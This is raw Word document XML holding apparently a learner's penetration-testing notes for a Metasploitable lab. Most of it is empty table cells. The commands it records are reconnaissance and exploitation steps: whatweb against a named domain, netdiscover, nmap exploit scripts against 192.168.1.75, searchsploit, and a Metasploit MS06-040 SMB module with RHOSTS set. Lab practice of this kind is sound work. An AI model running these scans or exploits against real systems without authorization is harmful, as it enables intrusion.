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631"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E4694E" w14:paraId="7FBB3717" w14:textId="77777777" w:rsidTr="007F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="494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31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7F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="494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31" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="768BA30C" w14:textId="3A426F01" w:rsidR="00620B00" w:rsidRDefault="00562B39">
            <w:r>
              <w:t>sudo ifconfig</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11F96FC9" w14:textId="77777777" w:rsidR="00620B00" w:rsidRDefault="00620B00"/>
          <w:p w14:paraId="68C514E5" w14:textId="77777777" w:rsidR="004E281E" w:rsidRPr="004E281E" w:rsidRDefault="004E281E" w:rsidP="004E281E"/>
          <w:p w14:paraId="2C2FBF44" w14:textId="77777777" w:rsidR="004E281E" w:rsidRDefault="004E281E" w:rsidP="004E281E"/>
          <w:p w14:paraId="4F514C9E" w14:textId="77777777" w:rsidR="004E281E" w:rsidRDefault="004E281E" w:rsidP="004E281E"/>
          <w:p w14:paraId="6DA6416A" w14:textId="7CF52961" w:rsidR="004E281E" w:rsidRPr="004E281E" w:rsidRDefault="004E281E" w:rsidP="004E281E">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="3350"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00475859" w14:paraId="1FF61CB4" w14:textId="77777777" w:rsidTr="007F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="494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31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7F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4945" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FB7EA53" w14:textId="77777777" w:rsidR="00475859" w:rsidRDefault="00475859" w:rsidP="00475859"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4631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7F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4945" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DA0E72E" w14:textId="77777777" w:rsidR="00475859" w:rsidRDefault="00475859" w:rsidP="00475859"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4631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7F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4945" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="748E3754" w14:textId="77777777" w:rsidR="00075D06" w:rsidRDefault="00075D06" w:rsidP="00475859"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4631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7F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4945" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A6B517E" w14:textId="77777777" w:rsidR="008A6748" w:rsidRDefault="008A6748" w:rsidP="00475859"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4631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7F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4945" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E3479EA" w14:textId="77777777" w:rsidR="00475859" w:rsidRDefault="00475859" w:rsidP="00475859"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4631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7F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4945" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BF81200" w14:textId="77777777" w:rsidR="00475859" w:rsidRDefault="00475859" w:rsidP="00475859"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4631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7F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4945" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2FF81CA7" w14:textId="74E5F485" w:rsidR="00577D6F" w:rsidRDefault="00D65D16" w:rsidP="00577D6F">
            <w:r>
              <w:t>Virtual Machine msfadmin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4631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7F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4945" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50DA4043" w14:textId="77777777" w:rsidR="00577D6F" w:rsidRDefault="00577D6F" w:rsidP="00577D6F"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4631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F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4945" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6563BF66" w14:textId="77777777" w:rsidR="00793CFB" w:rsidRDefault="00793CFB" w:rsidP="00793CFB"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4631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7F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4945" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C1AD004" w14:textId="77777777" w:rsidR="00793CFB" w:rsidRDefault="00793CFB" w:rsidP="00793CFB"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4631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7F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4945" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03614340" w14:textId="77777777" w:rsidR="00793CFB" w:rsidRDefault="00793CFB" w:rsidP="00793CFB"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4631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7F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4945" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25037CD9" w14:textId="77777777" w:rsidR="00793CFB" w:rsidRDefault="00793CFB" w:rsidP="00793CFB"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4631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7F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4945" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3649238F" w14:textId="77777777" w:rsidR="00793CFB" w:rsidRDefault="00793CFB" w:rsidP="00793CFB"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4631" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2EE5E3F7" w14:textId="77777777" w:rsidR="00793CFB" w:rsidRDefault="00793CFB" w:rsidP="00793CFB"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00ED3731" w14:paraId="5CEF6983" w14:textId="77777777" w:rsidTr="007F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9576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7F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="494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31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r>
              <w:t>Whatweb erertech.com -v</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00793CFB" w14:paraId="45F6F16F" w14:textId="77777777" w:rsidTr="007F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="494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31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6DB23695" w:rsidR="00243B6A" w:rsidRDefault="00243B6A" w:rsidP="007638FE">
            <w:pPr>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="68E4F0E8" w14:textId="4FEE5D28" w:rsidR="00A34F78" w:rsidRDefault="00A34F78" w:rsidP="007638FE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FB0B6B0" w14:textId="77777777" w:rsidR="00A34F78" w:rsidRDefault="00A34F78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7F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="494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31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7F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4945" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F0FCB42" w14:textId="77777777" w:rsidR="00793CFB" w:rsidRDefault="00793CFB" w:rsidP="00793CFB"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4631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7F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4945" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56518519" w14:textId="77777777" w:rsidR="00793CFB" w:rsidRDefault="00793CFB" w:rsidP="00793CFB"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4631" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="106C063F" w14:textId="77777777" w:rsidR="00793CFB" w:rsidRDefault="00793CFB" w:rsidP="00793CFB"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E568A" w14:paraId="108A3DDA" w14:textId="77777777" w:rsidTr="007F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9576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7F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4945" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22739F20" w14:textId="1EC3FB81" w:rsidR="00793CFB" w:rsidRDefault="00793CFB" w:rsidP="00793CFB"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4631" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48AC5AAD" w14:textId="77777777" w:rsidR="00793CFB" w:rsidRDefault="00793CFB" w:rsidP="00793CFB"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00793CFB" w14:paraId="01E2ACF6" w14:textId="77777777" w:rsidTr="007F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="494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31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7F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4945" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7011F863" w14:textId="77777777" w:rsidR="00793CFB" w:rsidRDefault="00793CFB" w:rsidP="00793CFB"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4631" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C72CF72" w14:textId="77777777" w:rsidR="00793CFB" w:rsidRDefault="00793CFB" w:rsidP="00793CFB"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00793CFB" w14:paraId="200DB7A8" w14:textId="77777777" w:rsidTr="007F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="494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31" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5629E39C" w14:textId="77777777" w:rsidR="00793CFB" w:rsidRDefault="00793CFB" w:rsidP="00793CFB"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00793CFB" w14:paraId="2A8ABBCA" w14:textId="77777777" w:rsidTr="007F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4945" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="494B75A8" w14:textId="41F1B9CF" w:rsidR="00793CFB" w:rsidRDefault="00793CFB" w:rsidP="00793CFB"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4631" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6EED8EC3" w14:textId="77777777" w:rsidR="00793CFB" w:rsidRDefault="00793CFB" w:rsidP="00793CFB"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00793CFB" w14:paraId="53A52E7C" w14:textId="77777777" w:rsidTr="007F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="494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31" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3336AD5A" w14:textId="77777777" w:rsidR="00793CFB" w:rsidRDefault="00793CFB" w:rsidP="00793CFB"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B049C" w14:paraId="126B563E" w14:textId="77777777" w:rsidTr="007F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="494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31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r w:rsidRPr="005A37FA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Sudo netdiscover</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B049C" w14:paraId="37A7A0CC" w14:textId="77777777" w:rsidTr="007F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="494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31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7F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4945" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33053313" w14:textId="77777777" w:rsidR="004B049C" w:rsidRDefault="004B049C" w:rsidP="004B049C"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4631" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69853B16" w14:textId="13BD90D6" w:rsidR="004B049C" w:rsidRDefault="004B049C" w:rsidP="004B049C"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00690490" w14:paraId="4721DF70" w14:textId="77777777" w:rsidTr="007F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9576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7F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="494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31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7F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="494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31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7F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="494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31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7F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4945" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37BD54C3" w14:textId="77777777" w:rsidR="004B049C" w:rsidRDefault="004B049C" w:rsidP="004B049C"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4631" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75699A92" w14:textId="77777777" w:rsidR="004B049C" w:rsidRDefault="004B049C" w:rsidP="004B049C"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B049C" w14:paraId="2923C798" w14:textId="77777777" w:rsidTr="007F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="494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31" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23E5275C" w14:textId="77777777" w:rsidR="004B049C" w:rsidRDefault="004B049C" w:rsidP="004B049C"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B049C" w14:paraId="1CB5B8DD" w14:textId="77777777" w:rsidTr="007F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4945" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5CACDD85" w14:textId="77777777" w:rsidR="004B049C" w:rsidRDefault="004B049C" w:rsidP="004B049C"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4631" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6EBB2635" w14:textId="77777777" w:rsidR="004B049C" w:rsidRDefault="004B049C" w:rsidP="004B049C"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B049C" w14:paraId="78C738EF" w14:textId="77777777" w:rsidTr="007F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="494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31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7F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="494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31" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67AA704B" w14:textId="77777777" w:rsidR="004B049C" w:rsidRDefault="004B049C" w:rsidP="004B049C"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B049C" w14:paraId="1962F86A" w14:textId="77777777" w:rsidTr="007F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4945" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52E9E410" w14:textId="77777777" w:rsidR="004B049C" w:rsidRDefault="004B049C" w:rsidP="004B049C"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4631" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71DF2A34" w14:textId="77777777" w:rsidR="004B049C" w:rsidRDefault="004B049C" w:rsidP="004B049C"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B049C" w14:paraId="021F2F00" w14:textId="77777777" w:rsidTr="007F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="494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31" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E4542C4" w14:textId="77777777" w:rsidR="004B049C" w:rsidRDefault="004B049C" w:rsidP="004B049C"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B049C" w14:paraId="24A1FEDD" w14:textId="77777777" w:rsidTr="007F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4945" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="015AC5A8" w14:textId="77777777" w:rsidR="004B049C" w:rsidRDefault="004B049C" w:rsidP="004B049C"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4631" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="125D696C" w14:textId="77777777" w:rsidR="004B049C" w:rsidRDefault="004B049C" w:rsidP="004B049C"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B049C" w14:paraId="00AA75AA" w14:textId="77777777" w:rsidTr="007F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="494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31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7F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4945" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2670A984" w14:textId="194A811B" w:rsidR="004B049C" w:rsidRDefault="004B049C" w:rsidP="004B049C"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4631" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B23ED9E" w14:textId="77777777" w:rsidR="004B049C" w:rsidRDefault="004B049C" w:rsidP="004B049C"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A1BBC" w14:paraId="0E5DBDA1" w14:textId="77777777" w:rsidTr="007F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9576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7F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="494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31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7F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4945" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="116F85B8" w14:textId="77777777" w:rsidR="004B049C" w:rsidRDefault="004B049C" w:rsidP="004B049C"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4631" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E69A16E" w14:textId="77777777" w:rsidR="004B049C" w:rsidRDefault="004B049C" w:rsidP="004B049C"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0047726D" w14:paraId="00C2D35A" w14:textId="77777777" w:rsidTr="007F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9576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7F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="494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31" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33419B7A" w14:textId="77777777" w:rsidR="004B049C" w:rsidRDefault="004B049C" w:rsidP="004B049C"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B049C" w14:paraId="2451F61F" w14:textId="77777777" w:rsidTr="007F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4945" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="656BDA11" w14:textId="77777777" w:rsidR="004B049C" w:rsidRDefault="004B049C" w:rsidP="004B049C"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4631" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7599B216" w14:textId="77777777" w:rsidR="004B049C" w:rsidRDefault="004B049C" w:rsidP="004B049C"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00991670" w14:paraId="30949E4E" w14:textId="77777777" w:rsidTr="007F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9576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7F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="494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31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7F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4945" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72FE4FA1" w14:textId="25E13FA9" w:rsidR="009F7C90" w:rsidRDefault="009F7C90" w:rsidP="009F7C90">
            <w:r>
              <w:t xml:space="preserve">Sudo nmap –script banner 192.168.1.75 -sS   </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4631" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2141C3BC" w14:textId="663B9CBA" w:rsidR="009F7C90" w:rsidRDefault="009F7C90" w:rsidP="009F7C90">
            <w:r>
              <w:t xml:space="preserve">Sudo nmap –script exploit 192.168.1.75 -sS   </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F7C90" w14:paraId="2CA987C1" w14:textId="77777777" w:rsidTr="007F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4945" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="314C14E1" w14:textId="77777777" w:rsidR="009F7C90" w:rsidRDefault="009F7C90" w:rsidP="009F7C90"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4631" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4EC9BECC" w14:textId="77777777" w:rsidR="009F7C90" w:rsidRDefault="009F7C90" w:rsidP="009F7C90"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F7C90" w14:paraId="258A785A" w14:textId="77777777" w:rsidTr="007F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="494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31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7F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4945" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C37EB76" w14:textId="77777777" w:rsidR="009F7C90" w:rsidRDefault="009F7C90" w:rsidP="009F7C90"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4631" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1850F4BF" w14:textId="77777777" w:rsidR="009F7C90" w:rsidRDefault="009F7C90" w:rsidP="009F7C90"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C369A3" w14:paraId="52108E8B" w14:textId="77777777" w:rsidTr="007F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9576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>Manual Vulnerability Analysis and searchploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F7C90" w14:paraId="32DC6A3E" w14:textId="77777777" w:rsidTr="007F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="494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Sudo nmap -sV {ipaddress}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(vsftpd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>Google it if theres already existing exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4631" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="106CA401" w14:textId="2D3DFC91" w:rsidR="009F7C90" w:rsidRDefault="00D31D64" w:rsidP="00D31D64">
            <w:pPr>
              <w:ind w:firstLine="720"/>
            </w:pPr>
            <w:r>
              <w:t>Searchsploit {version}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F7C90" w14:paraId="08314F12" w14:textId="77777777" w:rsidTr="007F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4945" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4CE4A8FC" w14:textId="77777777" w:rsidR="009F7C90" w:rsidRDefault="009F7C90" w:rsidP="009F7C90"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4631" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B33AAED" w14:textId="77777777" w:rsidR="009F7C90" w:rsidRDefault="009F7C90" w:rsidP="009F7C90"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D31D64" w14:paraId="0D676AD5" w14:textId="77777777" w:rsidTr="007F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9576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7F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="494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31" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0EAD3801" w14:textId="77777777" w:rsidR="009F7C90" w:rsidRDefault="009F7C90" w:rsidP="009F7C90"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F7C90" w14:paraId="0E9D12D9" w14:textId="77777777" w:rsidTr="007F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4945" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05F6E756" w14:textId="77777777" w:rsidR="009F7C90" w:rsidRDefault="009F7C90" w:rsidP="009F7C90"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4631" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C1577AD" w14:textId="77777777" w:rsidR="009F7C90" w:rsidRDefault="009F7C90" w:rsidP="009F7C90"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F7C90" w14:paraId="5FE38278" w14:textId="77777777" w:rsidTr="007F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4945" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3AE8D0FF" w14:textId="77777777" w:rsidR="009F7C90" w:rsidRDefault="009F7C90" w:rsidP="009F7C90"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4631" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10A68907" w14:textId="77777777" w:rsidR="009F7C90" w:rsidRDefault="009F7C90" w:rsidP="009F7C90"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F7C90" w14:paraId="648715CD" w14:textId="77777777" w:rsidTr="007F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4945" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="361126E3" w14:textId="77777777" w:rsidR="009F7C90" w:rsidRDefault="009F7C90" w:rsidP="009F7C90"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4631" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B0D9E84" w14:textId="77777777" w:rsidR="009F7C90" w:rsidRDefault="009F7C90" w:rsidP="009F7C90"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F7C90" w14:paraId="23F6907C" w14:textId="77777777" w:rsidTr="007F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4945" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D5C503C" w14:textId="77777777" w:rsidR="009F7C90" w:rsidRDefault="009F7C90" w:rsidP="009F7C90"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4631" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="497EE3D0" w14:textId="77777777" w:rsidR="009F7C90" w:rsidRDefault="009F7C90" w:rsidP="009F7C90"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F7C90" w14:paraId="6BF717F3" w14:textId="77777777" w:rsidTr="007F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4945" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4511AA6E" w14:textId="047D0620" w:rsidR="009F7C90" w:rsidRDefault="009F7C90" w:rsidP="009F7C90"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4631" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51C41F71" w14:textId="77777777" w:rsidR="009F7C90" w:rsidRDefault="009F7C90" w:rsidP="009F7C90"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F7C90" w14:paraId="0337E793" w14:textId="77777777" w:rsidTr="007F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4945" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="015EC6AF" w14:textId="77777777" w:rsidR="009F7C90" w:rsidRDefault="009F7C90" w:rsidP="009F7C90"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4631" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2BF8CF5D" w14:textId="77777777" w:rsidR="009F7C90" w:rsidRDefault="009F7C90" w:rsidP="009F7C90"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00262322" w14:paraId="5BF6B6F7" w14:textId="77777777" w:rsidTr="007F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9576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7F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="494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31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r w:rsidRPr="00893346">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Metaploit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7F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9576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/usr/share/Metasploit-framework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7F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9576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7F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4945" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31963007" w14:textId="3174D314" w:rsidR="009F7C90" w:rsidRDefault="00D32D8E" w:rsidP="009F7C90">
            <w:r w:rsidRPr="00DA0ECE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>msfconsole</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> – </w:t>
            </w:r>
            <w:r w:rsidR="00122EFC">
              <w:t xml:space="preserve">to trigger </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> in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31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7F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="494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31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7F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4945" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34EF7767" w14:textId="77777777" w:rsidR="002522F5" w:rsidRDefault="002522F5" w:rsidP="009F7C90"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4631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windows/smb/ms06_040.netapi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t xml:space="preserve">CL: </w:t>
            </w:r>
            <w:r w:rsidR="000C2769">
              <w:t>set RHOSTS 192.168.1.75</w:t>
            </w:r>
          </w:p>
